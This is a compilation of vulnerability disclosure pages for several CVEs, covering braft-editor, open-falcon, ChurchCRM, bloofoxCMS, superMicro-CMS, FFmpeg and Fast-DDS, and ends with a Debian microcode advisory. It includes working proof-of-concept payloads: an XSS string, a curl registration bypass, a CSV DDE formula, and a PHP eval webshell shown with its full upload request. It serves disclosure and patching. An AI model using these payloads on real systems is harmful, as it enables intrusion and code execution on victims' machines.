Cross Site Scripting (XSS) vulnerability in margox braft-editor version 2.3.8, allows remote attackers to execute arbitrary code via the embed media feature.

Dear Author,  
I’m testivy. I found that the current version of braft-editor has a a cross-site scripting (XSS) allows remote attackers to run arbitrary web script inside an div embed media element by injecting a crafted HTML element into the editor.  
As the offical demo site shown:  
https://braft.margox.cn/demos/basic  
or  
https://braft.margox.cn/  
  
When I come to the media library toolbar and choose the "adding network network resources " button below,and then select the embed media item as the figure shown below:  
  

****Loopholes Reproduce****

1.  Inject a crafted HTML element into the editor just like this  
    <img/src=1 onerror=alert(1)>
2.  Click the insert button  
    
3.  Click the play button to play the inserted video in this editor
4.  View the page and you will see a pop-up which running the arbitrary web script inside.  
    

****Vulnerability details****

This problem mainly occurs in braft-editor/src/renderers/atomics/Embed/index.jsx 

    return (
        <div className="bf-embed-wrap">
          <PlayerModal
            type="embed"
            onRemove={removeEmbed}
            poster={meta ? meta.poster || '' : ''}
            language={language}
            url={url}
            name={name}
            title={language.videoPlayer.embedTitle}
          >
            <div
              className="bf-embed-player"
              dangerouslySetInnerHTML={{ __html: url }}
            />
          </PlayerModal>
        </div>
    

As we can see, the above dangerouslySetInnerHTML ,this accept the url variable from the input without escape that could lead to run the arbitrary code even stealing the user's cookie. .etc.  
If we input the simple script like "<img/src=1 onerror=alert(1)>",the brower will render it to the html as below:  
<div class="bf-embed-player"><img src="1" onerror="alert(1)"></div> and finally pop a alert window.

Best Regards

CVE-2021-27524: Report a cross-site scripting (XSS)  security vulnerability in the braft-editor  allowing remote attackers to run arbitrary web script inside an div embed media element by injecting a crafted HTML ele

An issue was discovered in open-falcon dashboard version 0.2.0, allows remote attackers to gain, modify, and delete sensitive information via crafted POST request to register interface.

Dear Author,  
I’m testivy. I found that the latest version 0.2.0 of falcon dashboard has a bypass problem of the registeration.As the link below:  
http://book.open-falcon.com/en\_0\_2/quick\_install/frontend.html#dashboard-user-management  
when we try to change the value of item "signup\_disable" to "true" in the API configuration file "cfg.json" then reboot API for a purpose to restrict the register function meaning that this is only for "sign in" not for "sign up".  
I found in the code that I can bypass it under the "/auth/register " interface. In this condition, I can bypass the registeration restriction and do as below:  
Call the user added interface and add a new user (POST https://127.0.0.1:8081/auth/register name=test&cnname=test&email=test@test.cn&password=xxx&repeat_password=xxx), then use the newly added account to log in to the dashboard for viewing ,modifing, and adding .

**Vulnerability details**  
This problem mainly occurs in _dashboard/rrd/view/auth/auth.py_

    @app.route("/auth/register", methods=["GET", "POST"])
    def auth_register():
        if request.method == "GET":
            if g.user:
                return redirect("/auth/login")
            return render_template("auth/register.html", **locals())
    
        if request.method == "POST":
            ret = {"msg":""}
    
            name = request.form.get("name", "").strip()
            cnname = request.form.get("cnname", "").strip()
            email = request.form.get("email", "").strip()
            password = request.form.get("password", "")
            repeat_password = request.form.get("repeat_password", "")
    
    

As we can see, the above if branches:  
in **if request.method == "GET"** will judge the g.user otherwise redirect to "/auth/login" ,But when the request.method == "POST",the system will get request param to add a account by "name,cnname,email,password and repeat\_password" to the backend. Under the certain circumstances,we can directly call the "auth/register" interface with post method to add a new user.

**Loopholes Reproduce**  
1.curl -XPOST 'http://127.0.0.1:8081/auth/register'  --data 'name=test&cnname=test&email=test%40test.cn&password=test1234&repeat_password=test1234'  
As we can see, register restriction has been bypassed and a new account has been added to the dashboard management without logging in.  
The response is as below:  
{"msg":""}   
2.View the console  

Visit the index page http://127.0.0.1:8081/, then log in to the new account, and you will can do anything.

Best Regards

CVE-2021-27523: Report a security vulnerability in falcon dashboard to bypass register restriction through the function in register has been closed · Issue #153 · open-falcon/dashboard

CSV Injection vulnerability in ChurchCRM version 4.2.0, allows remote attackers to execute arbitrary code via crafted CSV file.

**Vulnerability Name:** CSV Injection/ Formula Injection  
**Severity:** High  
**Description:** CSV Injection (aka Excel Macro Injection or Formula Injection) exists in List Event Types feature in ChurchCRM v4.2.0 via Name field that is mistreated while exporting to a CSV file.  
**Impact:** Arbitrary formulas can be injected into CSV files which can lead to remote code execution at the client or data leakage via maliciously injected hyper-links.  
**Version Affected:** 4.2.0  
**Payload Used:** =10+20+cmd|' /C calc'!A0  
**Vulnerable URL:** master/EventNames.php  
**Vulnerable Parameters:** Name  
**Steps to Reproduce:**

1.  Login to the application, goto 'Events' module and then "List Event Types"
2.  Edit any event and inject the payload =10+20+cmd|' /C calc'!A0 in the 'Name' field
3.  Now goto 'List Event types' module and click CSV to download the CSV file
4.  Open the CSV file, allow all popups and our payload is executed (calculator is opened).  
      
    

**Note:** Incase the payload does not execute, then enable 'External Content' and 'Macro' settings in Excel. Goto Excel > File > Options > Trust Center > Trust Center Settings > Macro/External Content.  
**References:**  
https://nvd.nist.gov/vuln/detail/CVE-2019-12134  
http://cwe.mitre.org/data/definitions/1236.html

Just to confirm, this is not an issue with our CSV import but if a row had bad data the exported CVS has an issue. We use https://datatables.net/ if you have a chance, maybe you can help see if they have fixed that.

@DawoudIO I think the problem lies in the export feature. It would be nice to have an option in download csv to escape strings that begin with "+","-","@", or "=" by prepending "\\t".  
For any cell that begins with one of the formula triggering characters =, -, +, or @, you should directly prefix it with a tab character.

I'm not seeing how this is a particularly useful bug report. Anyone can create a CSV file with any arbitrary text in it using **any text editor** or text generation tool. How using ChurchCRM to generate a CSV with questionable content is a "bug" leaves me perplexed. For example, this logic implies the bash echo command has this same _"bug"_ too:

echo -e "Header 1, Header 2, Header 3\\n1,=10+20+cmd|' /C calc'!A0,Foo bar\\n2,Hello world,Text text" \> test.csv

If there was a method to use unauthenticated access to ChurchCRM that allowed insertion of arbitrary data values AND generate a CSV AND somehow send that somewhere then _maybe_ I'd consider this a flaw in ChurchCRM. Maybe I'm missing something?

I understand that this vulnerability would be much impactful if any unauthenticated user would be able to inject the payload resulting into code execution on the internal user's system. However this could also be impactful, if any internal user of the application enters the payload which results into impacting all the other user of the application. Here the payload is entered on ChurchCRM application leaving the application at fault to generate a file which can execute malicious commands on the user's system. A user may embed Dynamic Data Exchange (DDE) formulas to perform code execution, download a backdoor, open a malicious website etc.  
The legitimate user may download the file because of following reasons:

1.  The user trusts the site that the content is coming from.
2.  The user assumes that it is only a csv file and that it won't contain functions or macro's and won't care about any warnings from Excel about potential malicious functionality in the file.

https://owasp.org/www-community/attacks/CSV\_Injection#:~:text=CSV%20Injection%2C%20also%20known%20as,the%20software%20as%20a%20formula.  
https://payatu.com/csv-injection-basic-to-exploit

Feel free to create a PR.

CVE-2020-28848: CSV Injection Vulnerability · Issue #5465 · ChurchCRM/CRM

File Upload vulnerability in bloofoxCMS version 0.5.2.1, allows remote attackers to execute arbitrary code and escalate privileges via crafted webshell file to upload module.

I want to report an arbitrary file upload vulnerability that I found in bloofoxcms 0.5.2.1, through which we can upload webshell and control the web server.  
After entering the web management background, we can use the upload function to upload files：  
  
We create a new webshell file and name it script.php ：

    <?php @eval($_GET[1]);
    echo 'upload success';
    ?>
    

Click to select this file(script.php) :  
  
Click upload file(s) and grab the data package:  
  
First request package:

    POST /bloofoxCMS/admin/index.php?mode=tools&page=upload HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: multipart/form-data; boundary=---------------------------36808327791705981033859481452
    Content-Length: 1187
    Origin: http://127.0.0.1
    Connection: close
    Referer: http://127.0.0.1/bloofoxCMS/admin/index.php?mode=tools&page=upload
    Cookie: sid=o89l00kuhepcn1h7ls87vfsqa1
    Upgrade-Insecure-Requests: 1
    
    -----------------------------36808327791705981033859481452
    Content-Disposition: form-data; name="dir"
    
    ../media/images/
    -----------------------------36808327791705981033859481452
    Content-Disposition: form-data; name="file1"; filename="script.php"
    Content-Type: application/octet-stream
    
    <?php @eval($_GET[1]);
    echo 'upload success';
    ?>
     
    -----------------------------36808327791705981033859481452
    Content-Disposition: form-data; name="file2"; filename=""
    Content-Type: application/octet-stream
    
    
    -----------------------------36808327791705981033859481452
    Content-Disposition: form-data; name="file3"; filename=""
    Content-Type: application/octet-stream
    
    
    -----------------------------36808327791705981033859481452
    Content-Disposition: form-data; name="file4"; filename=""
    Content-Type: application/octet-stream
    
    
    -----------------------------36808327791705981033859481452
    Content-Disposition: form-data; name="file5"; filename=""
    Content-Type: application/octet-stream
    
    
    -----------------------------36808327791705981033859481452
    Content-Disposition: form-data; name="send"
    
    Upload File(s)
    -----------------------------36808327791705981033859481452--
    
    

First response package ：

    HTTP/1.1 302 Found
    Server: nginx/1.15.11
    Date: Fri, 25 Dec 2020 12:43:52 GMT
    Content-Type: text/html; charset=UTF-8
    Connection: close
    X-Powered-By: PHP/7.1.9
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    LOCATION: index.php?mode=tools&page=upload
    Content-Length: 0
    

Then we follow 302 redirection，  
Second request package ：

    GET /bloofoxCMS/admin/index.php?mode=tools&page=upload HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Origin: http://127.0.0.1
    Connection: close
    Referer: http://127.0.0.1/bloofoxCMS/admin/index.php?mode=tools&page=upload
    Cookie: sid=o89l00kuhepcn1h7ls87vfsqa1
    Upgrade-Insecure-Requests: 1
    

Second response package ：

    HTTP/1.1 200 OK
    Server: nginx/1.15.11
    Date: Fri, 25 Dec 2020 12:44:38 GMT
    Content-Type: text/html; charset=UTF-8
    Connection: close
    X-Powered-By: PHP/7.1.9
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    Content-Length: 6820
    
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    
    <html>
    <head>
    <title>bloofoxCMS Admincenter</title>
    <meta http-equiv="Content-Type" content="text/html; charset=" />
    <meta name="AUTHOR" content="bloofox, Alexander Lang" />
    <meta name="COPYRIGHT" content="bloofox.com, Alex Lang" />
    <meta name="DATE" content="12/25/2020" />
    <meta name="DESCRIPTION" content="bloofoxCMS Admincenter is the backend for managing the contents of bloofoxCMS" />
    <meta name="TITLE" content="bloofoxCMS Admincenter" />
    <link rel="stylesheet" type="text/css" href="../templates/admincenter/admincenter.css" />
    <link rel="icon" href="../media/images/favicon.ico" type="image/x-icon" />
    <link rel="shortcut icon" href="../media/images/favicon.ico" type="image/x-icon" />
    
    <script type="text/javascript" src="functions.js"></script>
    
    </head>
    
    <body>
    <div id="profile">
    	<a class='edit' href='index.php?page=myprofile' title='Edit Profile'><img src='../templates/admincenter/images/icon-set16/profile_edit.png' alt='Edit Profile' border='0' width='16' height='16' /></a>  <a href='index.php?page=myprofile'>Edit Profile</a><br />
    	<a class='edit' href='index.php?page=changepw' title='Change Password'><img src='../templates/admincenter/images/icon-set16/edit.png' alt='Change Password' border='0' width='16' height='16' /></a>  <a href='index.php?page=changepw'>Change Password</a><br /> 
    	<a class='delete' href='index.php?mode=logout' title='Logout'><img src='../templates/admincenter/images/icon-set16/logout.png' alt='Logout' border='0' width='16' height='16' /></a>  <a href='index.php?mode=logout'>Logout</a><br />
    	
    	<div class="close">
    	<a href="#" onclick="show_hide_layers('profile','','hide');">Close [x]</a>
    	</div>
    </div>
    
    <div id="wrap">
    	<div id="header">
    	<div style="float: left;"><span class="bold">bloofoxCMS Admincenter</span></div>
    	<div style="text-align: right; font-size: 11px; font-weight: bold;">
    	<a href="#" onclick="show_hide_layers('profile','','show');">Username: admin</a> &nbsp;&nbsp; <a class='delete' href='index.php?mode=logout' title='Logout'><img src='../templates/admincenter/images/icon-set16/logout.png' alt='Logout' border='0' width='16' height='16' /></a>  <a href='index.php?mode=logout'>Logout</a></div> 
    	<hr />
    	</div>
    	
    	<div id="sidebar">
    <div class="menu">
    <ul>
    	<li><a class='always' href="index.php" title='Home'>Home</a></li> 
    </ul>
    </div>
    
    <div class="menu">
    <ul>
    	<li><a class='always' href="index.php?mode=content" title='Contents'>Contents</a></li> 
    </ul>
    </div>
    <div class="submenu">
    <ul>
    	<li><a class='subalways' href="index.php?mode=content&page=levels">Structure</a></li>
    	<li><a class='subalways' href="index.php?mode=content&page=pages">Pages</a></li>
    	<li><a class='subalways' href="index.php?mode=content&page=articles">Articles</a></li>
    	<li><a class='subalways' href="index.php?mode=content&page=media">Media</a></li>
    </ul>
    </div>
    
    <div class="menu">
    <ul>
    	<li><a class='always' href="index.php?mode=settings" title='Administration'>Administration</a></li> 
    </ul>
    </div>
    <div class="submenu">
    <ul>
    	<li><a class='subalways' href="index.php?mode=settings">Settings</a></li>
    	<li><a class='subalways' href="index.php?mode=settings&page=projects">Projects</a></li>
    	<li><a class='subalways' href="index.php?mode=settings&page=lang">Languages</a></li>
    	<li><a class='subalways' href="index.php?mode=settings&page=tmpl">Templates</a></li>
    	<li><a class='subalways' href="index.php?mode=settings&page=plugins">Plugins</a></li>
    	<li><a class='subalways' href="index.php?mode=settings&page=charset">Charsets</a></li>
    </ul>
    </div>
    
    <div class="menu">
    <ul>
    	<li><a class='always' href="index.php?mode=user" title='Security'>Security</a></li> 
    </ul>
    </div>
    <div class="submenu">
    <ul>
    	<li><a class='subalways' href="index.php?mode=user">User</a></li>
    	<li><a class='subalways' href="index.php?mode=user&page=groups">User Groups</a></li>
    	<li><a class='subalways' href="index.php?mode=user&page=permissions">Permissions</a></li>
    	<li><a class='subalways' href="index.php?mode=user&page=sessions">Sessions</a></li>
    </ul>
    </div>
    
    <div class="menu">
    <ul>
    	<li><a class='current' href="index.php?mode=tools" title='Tools'>Tools</a></li> 
    </ul>
    </div>
    <div class="submenu">
    <ul>
    	<li><a class='subalways' href="index.php?mode=tools">Maintenance</a></li>
    	<li><a class='subcurrent' href="index.php?mode=tools&page=upload">Upload</a></li>
    	
    	
    	<li><a class='subalways' href="index.php?mode=tools&page=phpmyadmin">PhpMyAdmin</a></li>
    	<li><a class='subalways' href="index.php?mode=tools&page=stats">Statistics</a></li>
    </ul>
    </div>
    </div>
    	<div id="space"></div>
    	<div id="main" onclick="show_hide_layers('profile','','hide');">
    		<div id="content">
    		
    		
    <h2>Tools / Upload</h2>
    <div id="content-inlay">
    
    <p class='ok'><img src='../templates/admincenter/images/icon-set16/ok.png' alt='ok.png' border='0' width='16' height='16' /> Files have been uploaded successful.</p>
    
    <form action="index.php?mode=tools&page=upload" method="post" enctype="multipart/form-data">
    <table class="list">
    <tr class='bg_color3'>
    	<td width="150"></td>
    	<td></td>
    </tr>
    <tr class='bg_color2'>
    	<td>Directory</td>
    	<td><select name='dir'><option value='../media/images/'>../media/images/</option><option value='../media/files/'>../media/files/</option><option value='../languages/'>../languages/</option><option value='../templates/admincenter'>../templates/admincenter</option><option value='../templates/default'>../templates/default</option><option value='../media/images/profiles'>../media/images/profiles</option></select></td>
    </tr>
    <tr class='bg_color2'>
    	<td>Template Image</td>
    	<td><input type='checkbox' name='tmplimage' /></td>
    </tr>
    <tr class='bg_color2'>
    	<td>File</td>
    	<td><input type='file' name='file1' size='30' maxlength='250' /></td>
    </tr>
    <tr class='bg_color2'>
    	<td>File</td>
    	<td><input type='file' name='file2' size='30' maxlength='250' /></td>
    </tr>
    <tr class='bg_color2'>
    	<td>File</td>
    	<td><input type='file' name='file3' size='30' maxlength='250' /></td>
    </tr>
    <tr class='bg_color2'>
    	<td>File</td>
    	<td><input type='file' name='file4' size='30' maxlength='250' /></td>
    </tr>
    <tr class='bg_color2'>
    	<td>File</td>
    	<td><input type='file' name='file5' size='30' maxlength='250' /></td>
    </tr>
    </table>
    <br />
    <input class='btn' type='submit' name='send' value='Upload File(s)' />
    </form>
    </div>
    
    		
    		</div>
    	</div>
    
    	<div id="footer">
    	<hr />
    	<div style="text-align: right; float: right; font-size: 11px;"><a href='#'>Back to Top</a></div>
    	<div style="text-align: left; font-size: 11px;">
    Powered by <a href="http://www.bloofox.com" target="bloofox">bloofoxCMS</a> &copy; 2012</div>
    	</div>
    </div>
    
    </body>
    </html>
    

We can see that the file has been successfully uploaded to /bloofoxcms/media/images/script.php  

Finally, we can access the webshell address and execute any command：

CVE-2020-36082: An arbitrary file upload vulnerability was found · Issue #7 · alexlang24/bloofoxCMS

An issue was discovered in decode_frame in libavcodec/tiff.c in FFmpeg version 4.3, allows remote attackers to cause a denial of service (DoS).

**\[FFmpeg-devel\] \[PATCH 7/7\] avcodec/tiff: Disallow striped and tiled tiffs except for DNG****Michael Niedermayer** michael at niedermayer.cc  
_Fri Nov 6 01:11:10 EET 2020_

*   Previous message (by thread): \[FFmpeg-devel\] \[PATCH 6/7\] avcodec/h264idct\_template: Fix integer overflow in ff\_h264\_chroma422\_dc\_dequant\_idct()
*   Next message (by thread): \[FFmpeg-devel\] \[PATCH\] Moves yuv2yuvX\_sse3 to yasm, unrolls main loop and other small optimizations for ~20% speedup.
*   **Messages sorted by:** \[ date \] \[ thread \] \[ subject \] \[ author \]

strips + tiles is not allowed in TIFF
DNG uses a separate codepath

Regression since da5b3d002862d1e105002a6dc1567e6551860896.

Fixes: NULL pointer dereference
Fixes: poc1

Found-by: 1vanChen of NSFOCUS Security Team
Signed-off-by: Michael Niedermayer <michael at niedermayer.cc\>
---
 libavcodec/tiff.c | 7 +++++--
 1 file changed, 5 insertions(+), 2 deletions(-)

diff --git a/libavcodec/tiff.c b/libavcodec/tiff.c
index 2e45464218..00f0c0ccf7 100644
--- a/libavcodec/tiff.c
+++ b/libavcodec/tiff.c
@@ -1923,14 +1923,17 @@ again:
     has\_strip\_bits = s->strippos || s->strips || s->stripoff || s->rps || s->sot || s->sstype || s->stripsize || s->stripsizesoff;
 
     if (has\_tile\_bits && has\_strip\_bits) {
-        av\_log(avctx, AV\_LOG\_WARNING, "Tiled TIFF is not allowed to strip\\n");
+        int tiled\_dng = s->is\_tiled && is\_dng;
+        av\_log(avctx, tiled\_dng ? AV\_LOG\_WARNING : AV\_LOG\_ERROR, "Tiled TIFF is not allowed to strip\\n");
+        if (!tiled\_dng)
+            return AVERROR\_INVALIDDATA;
     }
 
     /\* now we have the data and may start decoding \*/
     if ((ret = init\_image(s, &frame)) < 0)
         return ret;
 
-    if (!s->is\_tiled) {
+    if (!s->is\_tiled || has\_strip\_bits) {
         if (s->strips == 1 && !s->stripsize) {
             av\_log(avctx, AV\_LOG\_WARNING, "Image data size missing\\n");
             s->stripsize = avpkt->size - s->stripoff;
-- 
2.17.1

*   Previous message (by thread): \[FFmpeg-devel\] \[PATCH 6/7\] avcodec/h264idct\_template: Fix integer overflow in ff\_h264\_chroma422\_dc\_dequant\_idct()
*   Next message (by thread): \[FFmpeg-devel\] \[PATCH\] Moves yuv2yuvX\_sse3 to yasm, unrolls main loop and other small optimizations for ~20% speedup.
*   **Messages sorted by:** \[ date \] \[ thread \] \[ subject \] \[ author \]

More information about the ffmpeg-devel mailing list

CVE-2020-36138: Disallow striped and tiled tiffs except for DNG

An issue was discovered in pcmt superMicro-CMS version 3.11, allows authenticated attackers to execute arbitrary code via the font_type parameter to setup.php.

**Vulnerability conditions: log in to the management background**

Vulnerability file：superMicro-CMS-main\\admin\\setup.php

\`  
// Write/overwrite settings file  
$settings = '../inc/settings.php'; //settings file  
$settings\_text = "<?php //settings\_text,Many parameters are user-controllable

if(!defined('ACCESS')) {  
die('Direct access not permitted to settings.php.');  
}

define('LOCATION', '{$site\_location}');  
define('ADMIN', '{$admin}');  
define('APACHE', {$apache});  
define('WINDOWS', {$windows});  
define('OPSYS', '{$opSystem}');  
define('HOME\_LINK', '{$home\_link}');  
define('NAME', '{$name}');  
define('ALPHABETICAL', {$alphabetical});  
define('SHOW\_ERRORS', {$show\_errors});  
define('TRACK\_HITS', {$track\_hits});  
define('PHP\_EXT', {$php\_ext});  
define('EMAIL', '{$email}');  
define('SITE\_NAME', '{$site\_name}');  
define('OWN\_NAME', '{$own\_name}');  
define('CONTACT\_TEXT', '{$contact\_text}');  
define('CONTACT\_MENU', '{$contact\_menu}');  
define('FONT\_TYPE', '{$font\_type}'); // This parameter is not filtered, I just start from here  
define('LANG\_ATTR', '{$lang\_attr}'); // This parameter also not filtered  
define('VERSION', '{$version}');

?>";  
$fp2 = @fopen($settings, 'w+'); //open settings.php  
fwrite($fp2, $settings\_text); // save content to settings.php\`

$font_type = $_POST['font_type']; // This value is not visible on the page and can be submitted with burpsuite

Vulnerability POC：

1.  log in to the management background
2.  Click setup-->Submit setup

3\. BurpSuite modify “font\_type” value

4\. Access this shell

CVE-2021-25857: Admin setup option getshell · Issue #2 · pcmt/superMicro-CMS

eprosima Fast DDS is a C++ implementation of the Data Distribution Service standard of the Object Management Group. Prior to versions 2.9.1 and 2.6.5, improper validation of sequence numbers may lead to remotely reachable assertion failure. This can remotely crash any Fast-DDS process. Versions 2.9.1 and 2.6.5 contain a patch for this issue.

**Comments**

squizz617 added a commit to squizz617/Fast-DDS that referenced this issue

Feb 7, 2023

Following 8.3.8.6.3 of DDS-RTPS 2.5.
This fixes issue eProsima#3236.

squizz617 added a commit to squizz617/Fast-DDS that referenced this issue

Feb 7, 2023

Following 8.3.8.6.3 of DDS-RTPS 2.5.
This fixes issue eProsima#3236.

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

squizz617 added a commit to squizz617/Fast-DDS that referenced this issue

Mar 15, 2023

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

MiguelCompany pushed a commit that referenced this issue

Mar 16, 2023

\* Implement a validity check for firstSN

Following 8.3.8.6.3 of DDS-RTPS 2.5.
This fixes issue #3236.

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

\* fix typo

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

\* add test input for issue #3236 (pr #3274)

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

---------

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

mergify bot pushed a commit that referenced this issue

Mar 16, 2023

 

\* Implement a validity check for firstSN

Following 8.3.8.6.3 of DDS-RTPS 2.5.
This fixes issue #3236.

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

\* fix typo

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

\* add test input for issue #3236 (pr #3274)

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

---------

Signed-off-by: Seulbae Kim <squizz617@gmail.com>
(cherry picked from commit 3aa3ee0)

mergify bot pushed a commit that referenced this issue

Mar 16, 2023

 

\* Implement a validity check for firstSN

Following 8.3.8.6.3 of DDS-RTPS 2.5.
This fixes issue #3236.

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

\* fix typo

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

\* add test input for issue #3236 (pr #3274)

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

---------

Signed-off-by: Seulbae Kim <squizz617@gmail.com>
(cherry picked from commit 3aa3ee0)

mergify bot pushed a commit that referenced this issue

Mar 16, 2023

 

\* Implement a validity check for firstSN

Following 8.3.8.6.3 of DDS-RTPS 2.5.
This fixes issue #3236.

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

\* fix typo

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

\* add test input for issue #3236 (pr #3274)

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

---------

Signed-off-by: Seulbae Kim <squizz617@gmail.com>
(cherry picked from commit 3aa3ee0)

MiguelCompany pushed a commit that referenced this issue

Mar 22, 2023

 

\* Implement a validity check for firstSN

Following 8.3.8.6.3 of DDS-RTPS 2.5.
This fixes issue #3236.

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

\* fix typo

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

\* add test input for issue #3236 (pr #3274)

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

---------

Signed-off-by: Seulbae Kim <squizz617@gmail.com>
(cherry picked from commit 3aa3ee0)

Co-authored-by: Seulbae Kim <squizz617@gmail.com>

MiguelCompany pushed a commit that referenced this issue

Mar 24, 2023

\* Implement a validity check for firstSN (#3274)

\* Implement a validity check for firstSN

Following 8.3.8.6.3 of DDS-RTPS 2.5.
This fixes issue #3236.

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

\* fix typo

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

\* add test input for issue #3236 (pr #3274)

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

---------

Signed-off-by: Seulbae Kim <squizz617@gmail.com>
(cherry picked from commit 3aa3ee0)

\* Refs #17717: Logging Macro fix

Signed-off-by: Mario Dominguez <mariodominguez@eprosima.com>

---------

Signed-off-by: Mario Dominguez <mariodominguez@eprosima.com>
Co-authored-by: Seulbae Kim <squizz617@gmail.com>
Co-authored-by: Mario Dominguez <mariodominguez@eprosima.com>

JLBuenoLopez-eProsima pushed a commit that referenced this issue

Apr 11, 2023

\* Implement a validity check for firstSN (#3274)

\* Implement a validity check for firstSN

Following 8.3.8.6.3 of DDS-RTPS 2.5.
This fixes issue #3236.

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

\* fix typo

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

\* add test input for issue #3236 (pr #3274)

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

---------

Signed-off-by: Seulbae Kim <squizz617@gmail.com>
(cherry picked from commit 3aa3ee0)

\* Refs #17717: Logging Macro fix

Signed-off-by: Mario Dominguez <mariodominguez@eprosima.com>

---------

Signed-off-by: Mario Dominguez <mariodominguez@eprosima.com>
Co-authored-by: Seulbae Kim <squizz617@gmail.com>
Co-authored-by: Mario Dominguez <mariodominguez@eprosima.com>

CVE-2023-39949: Assertion failure in SequenceNumber.h via malformed SPDP packet only when compiled in logging-enabled (Debug) mode · Issue #3236 · eProsima/Fast-DDS

Integer overflow vulnerability in av_timecode_make_string in libavutil/timecode.c in FFmpeg version 4.3.2, allows local attackers to cause a denial of service (DoS) via crafted .mov file.

author

Michael Niedermayer <michael@niedermayer.cc>

Mon, 1 Mar 2021 12:44:12 +0000 (13:44 +0100)

committer

Michael Niedermayer <michael@niedermayer.cc>

Sun, 14 Mar 2021 22:29:51 +0000 (23:29 +0100)

Fixes: Integer overflow and division by 0  
Fixes: poc-202102-div.mov

Found-by: 1vanChen of NSFOCUS Security Team  
Signed-off-by: Michael Niedermayer <michael@niedermayer.cc>

  

index b1b504edbf601d8cd59effa71b2edf97791aa0e6..2fc3295e25dedc328a2943673b7c8734570516c1 100644 (file)  

@@ \-114,8 +114,8 @@ char \*av\_timecode\_make\_string(const AVTimecode \*tc, char \*buf, int framenum)

     }

     ff = framenum % fps;

     ss = framenum / fps        % 60;

\-    mm = framenum / (fps\*60)   % 60;

\-    hh = framenum / (fps\*3600);

+    mm = framenum / (fps\*60LL) % 60;

+    hh = framenum / (fps\*3600LL);

     if (tc->flags & AV\_TIMECODE\_FLAG\_24HOURSMAX)

         hh = hh % 24;

     snprintf(buf, AV\_TIMECODE\_STR\_SIZE, "%s%02d:%02d:%02d%c%02d",

CVE-2021-28429: git.ffmpeg.org Git - ffmpeg.git/commitdiff

Debian Linux Security Advisory 5474-1 - This update ships updated CPU microcode for some types of Intel CPUs and provides mitigations for security vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5474-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
August 11, 2023                       https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : intel-microcode  
CVE ID         : CVE-2022-40982 CVE-2022-41804 CVE-2023-23908  
Debian Bug     : 1043305

This update ships updated CPU microcode for some types of Intel CPUs and  
provides mitigations for security vulnerabilities.

CVE-2022-40982

    Daniel Moghimi discovered Gather Data Sampling (GDS), a hardware  
    vulnerability which allows unprivileged speculative access to data  
    which was previously stored in vector registers.

    For details please refer to  
    <https://downfall.page/> and  
    <https://www.intel.com/content/www/us/en/developer/articles/technical/software-security-guidance/technical-documentation/gather-data-sampling.html>.

CVE-2022-41804

    Unauthorized error injection in Intel SGX or Intel TDX for some  
    Intel Xeon Processors which may allow a local user to potentially  
    escalate privileges.

CVE-2023-23908

    Improper access control in some 3rd Generation Intel Xeon Scalable  
    processors may result in an information leak.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 3.20230808.1~deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 3.20230808.1~deb12u1.

We recommend that you upgrade your intel-microcode packages.

For the detailed security status of intel-microcode please refer to its  
security tracker page at:  
https://security-tracker.debian.org/tracker/intel-microcode

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmTV0BxfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
